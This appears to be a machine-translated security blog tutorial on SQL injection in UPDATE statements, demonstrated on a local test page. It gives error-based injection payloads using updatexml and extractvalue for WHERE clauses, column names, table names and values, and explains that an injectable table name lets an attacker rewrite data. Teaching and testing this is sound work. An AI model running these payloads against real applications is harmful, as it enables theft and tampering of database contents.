Visit the home page of http://127.0.0.1/sql/update.php update module, began to update module test.

The update syntax:

UPDATE [users] SET [username] = 'haxotron9000' WHERE username = '1'Copy the code

The received parameters may be concatenated to any of the above statement [] positions, four positions, five different types. Let’s start the demo:

 

Syntax: String in WHERE clause

Construct the POC:

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'
Copy the code

Get the database version as shown below

Integer in WHERE Clause

Construct the POC:

1 or extractvalue(1,concat(0x7e,database())) or''
Copy the code

Get the database version as shown below

Third, the Column Name

The injection point is at [1],

UPDATE users SET 【1】 = ‘haxotron9000’ WHERE isadmin = 0 

There are two ways you can think of using it:

1, comment out the following statement, free construction error statement for execution

Alter user data in users table

POC:

UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))
Copy the code

  

Four, the Table Name

The injection point is at [1]

 UPDATE 【1】 SET username = ‘haxotron9000’ WHERE isadmin = 0 

How can we use it?

1, the name of the table can be controlled by itself, in the case of a certain table a certain column, you can change the data freely.

2, construct error injection, similar to the previous one.

 

五, Value to write

The injection point is at [1]

UPDATE users SET username =【 ‘1’】 WHERE isadmin = 0 

Construct the POC:

UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#
Copy the code

 

There seems to be nothing new, just these methods are switching, and then think of other methods to update

About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.